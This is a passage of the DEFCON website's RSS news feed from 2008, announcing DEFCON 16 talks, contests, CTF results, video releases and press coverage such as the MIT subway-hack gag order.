https://www.defcon.org/defconrss.xml If you didn't make it out to DEFCON 16, or just wanted to refresh on some of the great presentations we had this year, you can order full DVD copies of all of the talks from The Source of Knowledge (TSOK) website. TSOK's SynchVue DVD Format is new and improved, combining video and audio of the speaker, as well as slide material in one! From TSOK website: SynchVue DVD-ROM + SessionVue Audio The SynchVue DVD-ROM is an incredible product which merges the live audio with the projected image. Whether it is a PowerPoint presentation, software demonstration, video or web page, all of it is captured and synchronized seamlessly with the audio from the presenter. Check it out at: https://www.sok-media.com/store/products.php?event=2008-DEFCON

==> Poll: Should DEFCON Forums go SSL Only?

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums and weigh in on whether or not they should only be accessible over an SSL connection. If you are a forums member, there is a handy poll in which you can vote. If you're not a member, SIGN UP! From DT on the DEFCON Forums: Hey everyone, I'd like everyone's input on switching forum.defcon.org over to SSL only. Brief background: The way we do redirection from http to https is a clever kludge Cot came up with, but it prevents us from using http compression, which would speed things up for everyone. Now that mobile devices have supported http compression for years we may as well take advantage of it, not to mention it would be like getting extra free capacity. With SSL only some of the XSS and related attacks would be more difficult and MITM concerns would almost vanish. The downside is some people might not be able to log in through proxies (I can over Tor, though), at free WiFi locations, etc. https://forum.defcon.org/showthread.php?t=9967

==> Defcon.org is Being Remodeled!

https://www.defcon.org/defconrss.xml It's all behind the scenes of course, but defcon.org is currently being re-worked a bit to enhance the community aspect of the site, refresh some of the older content, and become more mobile friendly. Keep an eye out over the next several weeks for changes and enhancements to the site!

==> Remaining DEFCON 16 Swag available at J!NX

https://www.defcon.org/defconrss.xml For those of you that couldn't make it to this year's DEFCON, or just didn't get a chance to stop by the Swag Booth, the remainder of this year's swag can now be purchased from J!NX. Check out the available styles at http://www.jinx.com/def_con?tcid=1, but hurry, sizes and styles are limited!

==> DEFCON Speakers in the News

https://www.defcon.org/defconrss.xml Tony Kapela, who blew minds by using flaws in BGP to intercept and re-route all of the DEFCON 16 network traffic, is the featured speaker at Black Hat's fourth free webcast. the webcast is entitled "Trust Doesn't Scale - Practical Hijacking on the World's Largest Network. It promises to be an interesting presentation. To find out more, go to https://www.blackhat.com/html/webinars/practicalhijacking.html. To register, you can go to http://w.on24.com/r.htm?e=115053&s=1&k=526FB59D2232E5EE4DF1A158DEA07277. The webcast will begin Thursday, October 16 at 1pm PST.

==> DEFCON Badge Designer Joe Grand's TV Show Premiers Wednesday Oct. 15!

https://www.defcon.org/defconrss.xml As many of you may know, the unique electronic badges for DEFCON (since DC14) are designed by the illustrious Joe "Kingpin" Grand. Formerly a member of the hacker group L0pht Heavy Industries and currently the brain behind Grand Idea Studios and The Kingpin Empire, Joe also has a new TV show called "Prototype This" premiering this Wednesday, October 15th on the Discovery Channel at 10pm eastern time. The premise -- A team of four super smart guys with varying electronics and engineering backgrounds come up with and prototype crazy one-of-a-kind inventions on the cutting edge of technology in a limited time frame. It seems like this could be a great introduction for many into the world of hardware hacking and design. We're looking forward to see what they come up with! Upcoming Episode List: MIND CONTROLLED CAR - October 15 @ 10 e/p BOXING ROBOTS - October 22 @ 10 e/p TRAFFIC BUSTING TRUCK - October 29 @ 10 e/p GET UP AND GO - November 5 @ 10 e/p WATERSLIDE SIMULATOR - November 12 @ 10 e/p SIX-LEGGED ALL TERRAIN VEHICLE - November 19 @ 10 e/p Some links about the show: http://dsc.discovery.com/tv/prototype-this/prototype-this.html - Discovery Channel Page for Prototype This http://en.wikipedia.org/wiki/Prototype_This - Wikipedia Entry http://news.cnet.com/8301-13772_3-10016485-52.html - CNet News Article

==> Early Release Video from DEFCON 16! Tool from talk released!

https://www.defcon.org/defconrss.xml We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats, the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is quicktime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months! Brenno De Winter - Ticket to Trouble media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble_full.mov media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble.m4v Dan Kaminsky - DNS Goodness media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache_full.mov media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache.m4v Anton Kapela and Alex Pilosov - Stealing the Internet media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov_full.mov media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov.m4v Mike Perry - 365 Day: Active HTTPS Cookie Hijacking media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR_full.mov media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR.m4v Coincidentally, Slashdot reports that Mike Perry has released the tool from this talk today. you can find the article here: http://it.slashdot.org/it/08/09/09/1558218.shtml

==> DEFCON 16 Press Page Updated

https://www.defcon.org/defconrss.xml There were many press-worthy happenings at DEFCON 16 this year, from the MBTA controversy to the New way of expoiting BGP. We've collected many of the articles for you to peruse on the Past Media Coverage page. You can check it out at https://www.defcon.org/html/links/dc_press/dc_press.html. If you've noticed an article directly related to to DEFCON 16 we might have missed, send the url to neil ]at[ defcon {dot} org and we'll post it.

==> BGP exploit causing quite a stir

https://www.defcon.org/defconrss.xml Although it has been known for over a decade, an exploit of the Border Gateway Protocol (BGP) recently re-entered the spotlight at DEFCON 16 in a presentation by Anton Kapela and Alex Pilosov. The presentation is entitled "Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack ". You can read about the exploit on the Wired Threat level blog at http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html and you can download the slides from the presentation at https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

==> DEFCON 16 Presentations now online!

https://www.defcon.org/defconrss.xml Lose your DEFCON 16 CD? Looking for updated presentation materials? Did you just miss DEFCON 16 altogether? You're in luck! The presentation slides and extras from the DEFCON 16 CD, including updated presentations we have received thus far can now be downloaded on the DEFCON Media Archives page. Go to https://www.defcon.org/html/links/defcon-media-archives.html for all the goodies!

==> First Interview since silenced subway hacking talk

https://www.defcon.org/defconrss.xml Popular Mechanics has interviewed Zack Anderson, one of the silenced MIT Students who were to give the Anatomy of a Subway Hack talk at DEFCON 16. From Popular Mechanics: Its rare that a hacker convention makes national news, but three MIT students caused a whole lot of controversy when they planned a presentation about security holes in Boston's subway system for DefCon in Las Vegas earlier this month. They were forced to cancel the talk at the last minute by a 10-day federal restraining order, requested by Boston's Massachusetts Bay Transit Authority (MBTA). On Tuesday, a judge denied motions by the MBTA to issue a preliminary injunction aimed at keeping the students quiet for a further five months. Now, in his most extensive interview to date, MIT subway hacker Zack Anderson talks with PM about what's wrong with the Charlie Card, what happened at DefCon, and what it's like to tango with the FBI and the MBTA. Read more at: http://www.popularmechanics.com/technology/industry/4278892.html?page=1

==> MIT students gag order lifted!

https://www.defcon.org/defconrss.xml From CNET.com: BOSTON--The three Massachusetts Institute of Technology students who have been barred by a court order from discussing subway card vulnerabilities are now free to say what they want. In a ruling certain to be cheered by computer researchers, a federal judge here Tuesday let the 10-day-old gag order expire. U.S. District Judge George O'Toole Jr. refused to grant a preliminary injunction requested by the Massachusetts Bay Transportation Authority that would have blocked the students from talking about their findings until January 1, 2009. The MBTA's requested injunction would have replaced a temporary restraining order granted during the Defcon hacker conference, which under federal court rules automatically expires on Tuesday. Read more at: http://news.cnet.com/8301-1009_3-10020252-83.html?hhTest=1

==> Post DEFCON 16 items of note

https://www.defcon.org/defconrss.xml DEFCON 16 Receipt! For those of you that need a receipt for attending DEFCON 16, it can be downloaded from here: https://www.defcon.org/images/defcon-16/dc16_receipt.pdf Upload your Photos! Now that con has ended, get on over to pics.defcon.org and upload all of your awesome pics and videos from the show! We want to see them!

==> New Talk: Ticket to Trouble

https://www.defcon.org/defconrss.xml Brenno De Winter will be speaking Sunday on controversy surrounding hacks of the Belgian Subway system. The presentation will occur 13:00 to 13:50 in Track 3.

==> DEFCON 16 NEWS: MIT Students Gagged by Federal Court Judge

https://www.defcon.org/defconrss.xml The EFF Announced today that they will represent 3 MIT students who were set to present at DEFCON 16 on Mass transit vulnerablities. The students were forced to cancel their presentation on Sunday, due to a Federal Court Judge's Order. From eff.org: MIT Students Gagged by Federal Court Judge EFF Backs Researchers Forced to Cancel Presentation on Transit Fare Payment System Las Vegas - Three students at the Massachusetts Institute of Technology (MIT) were ordered this morning by a federal court judge to cancel their scheduled presentation about vulnerabilities in Boston's transit fare payment system, violating their First Amendment right to discuss their important research. (read more at: http://www.eff.org/press/archives/2008/08/09 To see what other press is happening at DEFCON 16, check out the DEFCON in the news thread at https://forum.defcon.org/showthread.php?p=98012#post98012

==> DEFCON Updates

https://www.defcon.org/defconrss.xml DEFCON 16 Capture the Flag is Coming! In just a couple of days, the ultimate battle will begin at DEFCON 16. That's right, we're talking about the DEFCON Capture the Flag Competition organized by Kenshoto! Eight Teams will unleash their best root-fu in the struggle for the coveted CTF Title! The Following teams will be competing. 1@stPlace (returning champions) Routards Pandas with Gambas Guard@MyLan0 Shellphish Taekwon-V WOWHACKER PLUS 4800 Head into CTF Room in Royale Pavilion to Check out the action! New Talk Added: Toying with Barcodes By Felix "FX" Lindner on Saturday at 17:00 in Track 1. Check it out at: https://www.defcon.org/html/defcon-16/dc-16-speakers.html#FX2

==> Don't Miss the TCP/IP Drinking Game!

https://www.defcon.org/defconrss.xml The annual must-see Defcon event of BGP, booze, and bemusement returns in this year's TCP/IP Drinking Game. Panelists will pit their trivia knowledge of network trivia against one another and the ever-present haze of inebriation for all to see. We promise that no RFC nor hepatic system will be spared. As always, solid audience participation is encouraged, so bring well-researched queries.* This year's event will be hosted by Adam J. O'Donnell, security researcher and provocateur. The usual M.C. of the TCP/IP drinking game, Dr. Mudge, is spending this year sober for tax purposes... see you next year with my new bionic liver :) ..mudge * Anyone asking about Windows 98 TCP/IP UIs will be promptly ejected. Friday @ 20:00 in Speaking Track 4

==> Stay in the loop with the DEFCON 16 Twitter feed!

https://www.defcon.org/defconrss.xml The vehicle of choice this year for up to the minute updates of breaking DEFCON news, announcements and so forth will be the DEFCON 16 Twitter feed. Sign up now at http://twitter.com and follow user defcon16 to keep up to date with this year's DEFCON! See news breaking? Send events of note at DEFCON 16 to defconupdates {at} gmail ]dot[ com so we can tell the world!

==> New Happenings at DEFCON 16

https://www.defcon.org/defconrss.xml Well folks, the time for the 16th installment of the hacking convention known as DEFCON draws near, and this year promises to be a great one! We've got more content than ever, including 5 full tracks of talks, demos, workshops, new contests, a new Hardware Hacking Village, and even a new EFF fundraiser to replace the dunk tank! Here is some of the goodness you can expect: DAVIX Visualization Workshop At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures! Get more info at: https://forum.defcon.org/forumdisplay.php?f=425 Mobile Hacker Spaces Interested in visiting a Colorado Hacker Space here at DefCon 16? Check out the first ever Mobile Hacker Space, which will be parked in the outside chill out area during the convention. Try your hand against one of the challenges in the pentest lab, or learn from the web-based tutorials posted on the open network. Participation is encouraged, and presentations will be given every day from 2-4pm, which will provide a more hands-on look at how the Mobile Hacker Space operates and fits within published hacker space design patterns. Make sure you also attend the presentation on the history and design of the Colorado Springs Mobile Hacking Space on Sunday, at 1pm in Track One. Forums link: https://forum.defcon.org/forumdisplay.php?f=428 Quantum Spookshow Quantum mechanics make possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Hours: 10:00-18:00 on Friday and Saturday with Sunday, closing around 16:00 Location: 114. Directly across from the Contest area. EFF Fundraiser This year we decided to replace our beloved Dunk Tank with something NEW! Hackers and Guns in Las Vegas Ya gotta love it. You've seen it played out numerous times in movies and on TV. A flash bang grenade goes off. SWAT kicks in the door and moves quickly to differentiate between the good guys and the bad guys in the same room. How do they train to effectively recognize and take out the bad guys, while not wasting any of the hostages? One of the tools they use is a Firearms training Simulator or FATS system and someone was foolish enough to let us get our hands on one for DEFCON 16. So Calling all Shooters, FPS Gamers, Psycho Killers, and 1337 wannabes. Come on by and pop a cap in someones VR bleep. We will be set up in room 115 across from the contest area and next door to the Quantum Spookshow from 10:00 20:00. See if you got the skillz to make it through the challenges unscathed. Then the next time you hear a knock at your door in the middle of the night - you'll be ready. More at: https://forum.defcon.org/forumdisplay.php?f=427

==> WarBallooning Demo at DEFCON 16!

https://www.defcon.org/defconrss.xml A WarBalloon, er... Airborne Surveillance & 802.11 Stumbling Platform, also known as the "Kismet Eye in the Sky" will be flying just outside the DEFCON convention center on FRI and SAT from 11AM - 2 PM. DEFCON Attendees: please note the Balloon & Electronics launch will occur Daily at 11:00 AM & several times during the day as we change antenna's & recon. new targets. Read more at: https://forum.defcon.org/showthread.php?t=9613

==> The DEFCON Shoot is Back!

https://www.defcon.org/defconrss.xml From the DEFCON Shoot Page on Deviating.net: The DEFCON Shoot is a public event happening just prior to the DEFCON hacker conference in Las Vegas, Nevada. Anyone who wants to can show up and for a small fee make use of a private range located about 30 minutes outside of the city. There will be opportunities to see and possibly shoot some of the weapons belonging to your friends and it will also be possible to rent firearms (including Class-III full autos) from the range itself. In addition to having a number of terrific pieces of hardware on-site, the range is directly affiliated with Small Arms Review Magazine and thus has access to their nearly limitless archive of equipment. Anything from a WWII Bren Gun to a Vulcan Cannon-style Minigun is possible. As of right now, the event's ability to come off is contingent on participation... that means that we need you if we're going to make it happen. I have run the numbers, and I can acquire us private range time at a very sweet facility if we have about a little over two dozen people showing up, provided that about at least ten of them are interested in some full-automatic action. Read on for more details about location, pricing, etc. You can sign up on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=9574 You can get all the info at http://deviating.net/firearms/defcon_shoot/

==> DEFCON 16 Contest & Events Update!

https://www.defcon.org/defconrss.xml New DEFCON 16 Events/Contests There are few new happenings recently added to the mix that you might want to know about, such as the EEE PC Mod workshop, The Leetskills Talent Competition, as well as Buzzword Survivor, where you can win your share of $10k! Get all the up to the minute info athttps://forum.defcon.org/forumdisplay.php?f=346! DEFCON 16 Black & White Ball: Acts Announced Get ready for some hot DJ action kids! Zziks has posted a tentative lineup for the Black & White bleep and Daytime Chillout Area. Check them out as they evolve on the Forums at https://forum.defcon.org/showthread.php?t=9533!

==> Mystery Box Wildcard Slot

https://www.defcon.org/defconrss.xml There will be one wildcard (walk-on) team allowed this year. Each year I have people asking about the contest after it is too late. This is my means of dealing with those people. Keep in mind that the first year Mystery Challenge ran a walk-on team won the competition. Friday morning I will be accepting intentions to compete. THIS MAY CHANGE TO THURSDAY NIGHT. If only one team shows for this position, it is theirs. If multiple teams show, there will be a mini-challenge race to determine who gets the spot. Anyone who intends to try for the walk on team should email me their intentions prior to con if possible. (DC16MysteryChallenge [at] MysteryChallenge ]dot[ org. This will help me gauge the magnitude of the mini-challenge race, if necessary (and it just helps me get an idea of the number trying out). See you all in a few weeks. LosT

==> Seeking Contestants! Win your share of 10K!

https://www.defcon.org/defconrss.xml The wait is over. Buzzword survivor is here. The rules are simple, the money is real. Rules: You sit and listen to 36 hours of straight vendor pitches - No sleeping - Eat what you want - Bathroom breaks when you need them - Stand and stretch when you need to, but you have to stay focused on the presenter. Prize: - 10 contestants - Half the pot gets divided by all remaining contestants at the end. - Half the pot get divided 60, 30, 10 by 1st, 2nd, 3rd in test scores. Prizes as of June 1, 2008 (assuming all 10 make it to the end). Pot could rise depending on number of sponsors. - 1st: $3500 - 2nd: $1500 - 3rd: $750 - All others: $500 To become a contestant email: buzzwordsurvivor@gmail.com

==> Mystery Challenge registration closed

https://www.defcon.org/defconrss.xml Mystery Challenge registration is now closed. There will be 1 wildcard team allowed to sign up the first day of Defcon. Should multiple teams desire this position, there will be a mini-contest. Interested parties should email LosT with their intent to try for the wildcard slot.

==> DEFCON 16 Schedule now on-line!

https://www.defcon.org/defconrss.xml DEFCON 16 Schedule now on-line! We are proud to present the schedule of speakers and events for DEFCON 16! Thanks to all the new space available at the Riviera Hotel & Casino, we have even more room this year. 4 Full speaking tracks and an additional "Breakout" track filled with cool talks, demonstrations and workshops. We are pleased at our lineup, and the amazing list of speakers who really diversified the content this year. Link: http://defcon.org/html/defcon-16/dc-16-schedule.html Keep checking the website and schedule for changes, Contests & Event Schedules and Workshop room locations. This year is packed with more stuff to enjoy than any years prior and we hope you like it just as much as we do! See you at the show!

==> Mystery Challenge Reg Closing Sunday 6/29

https://www.defcon.org/defconrss.xml Mystery Challenge Registration will close this Sunday (6/29/08) at 11:59:59 PM. If you intend to register do it now. There should be sufficient information in the forums and on MysteryChallenge.org at this point. 1057

==> DEFCON Badge Hacking Contest!

https://www.defcon.org/defconrss.xml Recently announced at the DEFCON forums: The DEFCON Badge Hacking Contest awards the top 3 most ingenious, obscure, mischievous, obscene, or technologically astounding badge modifications created over the weekend. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product, and it exists for your hacking pleasure. We've had some amazing hacks in previous years. For info on the past badges and badge hacking contest entries, check out: http://www.grandideastudio.com/portf...fcon-15-badge/http://www.grandideastudio.com/portf...fcon-14-badge/ This is the first year that it will be an official contest announced in advance, etc., as previously we've kept the whole thing under wraps until the first day of the con. For more info go to https://forum.defcon.org/showthread.php?t=9502

==> People's Choice voting is open for the DC16 Artwork Contest!

https://www.defcon.org/defconrss.xml Let the voting commence! Go to the DEFCON 16 Artwork Contest Public Gallery at https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770 to view this year's submissions. Once you have found your favorite go ahead and cast your vote at: https://forum.defcon.org/showthread.php?t=9497. Voting for the People's Choice category will run for one week, ending June 30th at 6pm. You will need a DEFCON Forums account to vote, so if you don't have one, sign up now at forum.defcon.org

==> Final round of DEFCON 16 Speakers chosen!

https://www.defcon.org/defconrss.xml This is it, Ladies and Germs, the last few DEFCON 16 speakers have been chosen and the Talk schedule is now in it's final stages. Look for the DEFCON 16 Schedule page to be updated this week at https://www.defcon.org/html/defcon-16/dc-16-schedule.html. For now, check out the speaker page and see what these latest selections are all about! Grendel-Scan: A new web application scanning tool David Byrne, Eric Duprey Comparison of File Infection on Windows & Linux Iclee_vx Anti-RE Techniques in DRM Code Jan Newger How can I pwn thee? Let me count the ways Renderman Hijacking the Outdoor Digital Billboard Network Tottenkoph, Rev You can discuss the speakers and talks on the DEFCON Forums at: https://forum.defcon.org/showthread.php?t=9496

==> DEFCONBots is Back!

https://www.defcon.org/defconrss.xml DefconBots is back this year with the same rules as last year. Now is a great time to get started on your bot! Last year there were six competitors, this year let's get a lot more! Don't let "I can't solder" stop you again, you can get started with a simple kit available through http://defconbots.org There's even open source software to get you started in linux.

==> New DEFCON 16 Speakers Posted!

https://www.defcon.org/defconrss.xml 9 more talks have been added to the DEFCON 16 lineup, and are listed below, Alpha by Speaker Digital Security: a Risky Business Ian O. Angell Pen-Testing is Dead, Long Live the Pen Test Taylor Banks Hacking the Bionic Man Gadi Evron Panel: Internet Wars 2008 Gadi Evron Moderator The Big Picture: Digital Cinema Technology and Security Mike Renlund Inducing Momentary Faults Within Secure Smartcards / Microcontrollers Christopher Tarnovsky MetaPost-Exploitation Valsmith, Colin Ames Password Cracking on a Budget Matt Weir, Sudhir Aggarwal New ideas for old practices - Port-Scanning improved Fabian "fabs" Yamaguchi, FX

==> DEFCON 16 Artwork Contest Extended!

https://www.defcon.org/defconrss.xml Due to late blooming interest in the contest, all entries for the DEFCON 16 Artwork Contest will be accepted up until 5pm PST on Sunday June 22, 2008. You can find the rules at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Voting for the People's Choice category will commence Monday June 23, 2008 and will run for one week on pics.defcon.org. A link to the voting gallery and instructions will follow at that time. You will need a DEFCON Pics account to vote, so if you don't have one, sign up now! Good luck all!

==> Defcon Goon: Speaker Operations: Call for Volunteers

https://www.defcon.org/defconrss.xml From Agent X on the DEFCON Forums: The few, the proud (arrogant?) ,the insane? Yes, that's right Speaker Operations a subset of the Defcon Goon Squad is looking for a few good folks. Speaker Operations goons are the blue shirts that ferry speakers to and from stage, keep the speaking schedule in order, and generally try to make the talks not suck... Sometimes we succeed, sometimes we fail, generally there is beer at the end. In an effort to ensure a healthy supply of goons for future Defcons, I'm holding semi-formal auditions/interviews this year at Defcon 16. So if you interested in joining the ranks of the Defcon Speaker Operations Goons squad, here's what you've got to do: * Write me an email, telling my why you will rock speaker operations. (In a good way). * Demonstrate your resourcefulness by tracking me down and arranging a time for us to talk at Defcon this year. Make it memorable...it's a busy con you know. * Demonstrate to the speaker operations staff those blue shirted goons again, you know why they are so awesome (?!Schwag, beer?!) Thank you for your interest. Agent X https://forum.defcon.org/showthread.php?t=9474

==> Open CTF Registration is now Open!

https://www.defcon.org/defconrss.xml Formerly known as Amateur Capture The Flag (aCTF), this contest pits any Defcon attendee against the house (DC949) as well as other contestants. There are a series of challenges of varying difficulty involving a variety of things, including cryptology, stenography, malicious software, and websites (and other services) just waiting to be exploited. Find out more at: http://dc949.org/oCTFIV/

==> Movie Night with the Dark Tangent

https://www.defcon.org/defconrss.xml This year on Friday night we will be screening a documentary, Hackers Are People Too, which will end before the director/producer needs to participate in Hacker Jeopardy. Then we will move on to some Blu-Ray goodness of "Appleseed Ex-Machina" for the latest in cg anime from Japan. Saturday evening we will go retro with "Three Days of the Condor", where you can see an early Robert Redford deal with spies, telephones, and intrigue. For those who have seen 'safehouse' you'll recognize a scene for scene rip off homage to "Condor" Then we'll close with as of yet TBD movie...

==> Qualifying CTF Teams for DEFCON 16

https://www.defcon.org/defconrss.xml The following teams have demonstrated their uber prowess by qualifying to participate in the DEFCON 16 Capture the Flag Contest, organized by Kenshoto. These 7 teams will be battling last year's winners, 1@stPlace, for the CTF title! DEFCON would like to congratulate all of these talented teams and wish them luck! Routards 5200 Trivia 1500 Binary Leetness 1000 Forensics 1500 Real World 600 Potent Pwnables 600 Pandas with Gambas 5200 Trivia 1500 Binary Leetness 1000 Forensics 1500 Potent Pwnables 600 Real World 600 Guard@MyLan0 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 Shellphish 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 Taekwon-V 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 WOWHACKER 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 PLUS 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600

==> Mystery Challenge Registration Closing Soon!

https://www.defcon.org/defconrss.xml The LosT@Con Mystery Challenge preregistration will remain open for an undisclosed bit longer. Teams who have not completed the preregistration but that intend to enter are encouraged to post such intentions in the DC forums. This year there will be one wildcard slot open, and a mini-contest will be held two hours prior to the official contest start for that slot. https://forum.defcon.org/forumdisplay.php?f=369

==> Sign up for Hacker Jeopardy and Buzzword Survivor!

https://www.defcon.org/defconrss.xml Hacker Jeopardy The Official Hacker Jeopardy entry thread on the DEFCON Forums is now open for signup, at https://forum.defcon.org/showthread.php?t=9444 From the signup thread: This year, we will be accepting applications from both teams and individuals. We will likely hold a set of qualifying games Friday afternoon to allow unproven teams/people a chance to show off their skillz and advance into the late night tournament. Buzzword Survivor - NEW! Buzzword Survivor is a new contest that pits you against 36 hours of vendor pitches, with big cash prizes! Find out what it's all about and sign up at https://forum.defcon.org/forumdisplay.php?f=352

==> DEFCON 16 Artwork Contest Reminder

https://www.defcon.org/defconrss.xml There's only a little over a week left to submit your creations for the DEFCON 16 Artwork Contest. The Contest info and rules can be found at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Current submissions are on https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770

==> Another Round of DEFCON 16 Speakers are Live!

https://www.defcon.org/defconrss.xml We've got more talks up on the speaker page, listed below, alpha by speaker BackTrack Foo - From bug to 0day Mati Aharoni They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention Jay Beale Arbitrary code injecting MITM attack vectors Joachim De Zutter "byterage" Wide World WAF's Ben Feinstein Virtually Hacking John Fitzpatrick Malware RCE: Debuggers and Decryptor Development Michael Ligh Fear, Uncertainty and the Digital Armageddon Morgan Marquise-Boire Toasterkit, a Modular NetBSD Rootkit Anthony Martinez, Thomas Bowen Bringing Sexy Back: Breaking in with Style David Maynor, Robert Graham Panel: All Your Sploits (and Servers) Are Belong To Us: Vulnerabilities Don't Matter (And Neither Does Your Security) David Mortman, Rich Mogull, Chris Hoff, Robert "RSnake" Hansen, Robert Graham, David Maynor Solid Stated Drives Destroy Forensic & Data Recovery Jobs: Animated! Scott Moulton Urban Exploration - A Hacker's View Phreakmonkey Beholder: New wifi monitor tool Nelson Murilo, Luiz 'effffn' Eduardo Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly Vic Vandal RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife David Weston, Tiller Beauchamp https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> Gringo Warrior at DEFCON 16 NEW!

https://www.defcon.org/defconrss.xml Participants in Gringo Warrior will have five minutes to free themselves from handcuffs, escape from their "cell", get past a guard, retrieve their passport from a locked filing cabinet, leave through another locked door, and make their escape to freedom. The course will offer a variety of locks representing a range of difficulty, allowing participation by people of all skill levels. Points will be awarded based on the time of completion as well as the difficulty of locks attempted. The best warrior of all wins the grand prize! Get the full story at: https://forum.defcon.org/showthread.php?t=9401

==> DEFCON 16 now has a Twitter Feed!

https://www.defcon.org/defconrss.xml DEFCON 16 Now has a Twitter Feed for all you Tweeters out there! Frequent updates will be forthcoming up to and during the con to keep you in the loop for news, contest updates and events. http://www.twitter.com/defcon16

==> DEFCON 16 CTF Quals Complete

https://www.defcon.org/defconrss.xml From Kenshoto.com: See the final results at http://www.kenshoto.com/results.txt! The first 7 teams on the list have qualified. If any are unable to attend, invitations will be extended to the alternates in scoring order.

==> DEFCON 16 Slogan Contest Now Open

https://www.defcon.org/defconrss.xml Do you think you have the wordsmithing skills to come up with he next great DEFCON slogan? The DEFCON 16 Slogan Contest is now up and running, so get on over to http://www.totallybog.us/dc16slogan/dc16slogan.html and submit your literary gems for a chance to be featured in the DEFCON 16 Program!

==> More DEFCON 16 Speakers Online!

https://www.defcon.org/defconrss.xml Working with Law Enforcement Don M. Blumenthal CSRF Bouncing Michael Brooks Hacking Desire Ian Clark Compromising Windows Based Internet Kiosks Paul Craig Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key Thomas d'Otreppe de Bouvette "Mister_X", Rick Farina "Zero_Chaos" Snort Plug-in Development: Teaching an Old Pig New Tricks Ben Feinstein Playing with Web Application Firewalls Wendel Guglielmetti Henrique Advanced Software Armoring and Polymorphic Kung Fu Nick Harbour Under the iHood Cameron Hotchkies Tuning Your Brain. Lyn Forensics is ONLY for Private Investigators Scott Moulton Every Breath You Take Jim O'Leary Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving, Or, Techniques of Industrial Espionage Eric Schmiedl Gaming - The Next Overlooked Security Hole Ferdinand Schober Making a Text Adventure Documentary Jason Scott StegoFS James Shewmaker Let's Sink the Phishermen's Boat! Teo Sze Siong, Hirosh Joseph Medical Identity Theft Eric Smith, Dr. Shana Dardan Web Privacy and Flash Local Shared Objects Clinton Wong

==> Beverage Cooling Contraption Contest on Hack A Day!

https://www.defcon.org/defconrss.xml The BCCC run by Deviant Ollam has popped up on hackaday.com! From the article: Let's face it: no one likes warm beer. In the arid August air of Las Vegas, though, it's difficult to get anything else. To combat this problem, Deviant has hosted a competition the last three years at Defcon called the Beverage Cooling Contraption Contest, or BCCC. We're not talking about something as simple as a Coleman cooler or even a peltier cooler: the devices entered in this contest have to be able to take a beer from hot to cool and your glass within minutes. For info on the contest, go to: http://www.deviating.net/bccc

==> Round two of DEFCON 16 speaker selections!

https://www.defcon.org/defconrss.xml The selection process continues, and the second batch of talks for DEFCON 16 is now on the the speaker page. They are listed below, alpha by speaker! Check 'em out! Autoimmunity disorder in Wireless LAN Md Sohail Ahmad, JVR Murthy, Amit Vartak The Anatomy of a Subway Hack: Breaking Crypto RFID's and Magstripes of Ticketing Systems Zack Anderson, RJ Ryan, Alessandro Chiesa Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How Luciano Bello, Maximiliano Betacchini Buying Time- What is your Data Worth? (A generalized Solution to distributed Brute Force attacks) Adam Bregenzer ModScan: A SCADA MODBUS Network Scanner Mark Bristow Deciphering Captcha Michael Brooks Hacking Data Retention: Small Sister your digital privacy self defense Brenno De Winter Markets for Malware: A structural Economic Approach Brian K. Edwards, Silvio J. Flaim Identification Card Security: Past, Present, Future Doug Farre VLANs Layer 2 Attacks: Their Relevance and their Kryptonite Kevin Figueroa, Marco Figueroa, Anthony L. Williams Journey to the center of the HP28 Travis Goodspeed Nail the Coffin Shut, NTLM is Dead Kurt Grutzmacher Race-2-Zero Unpacked Simon Howard Triad-Based Music Steganography Adrian Johnson Panel: Black vs. White: The complete life cycle of a real world breach David Kennedy, Ken Stasiak, Scott White, John 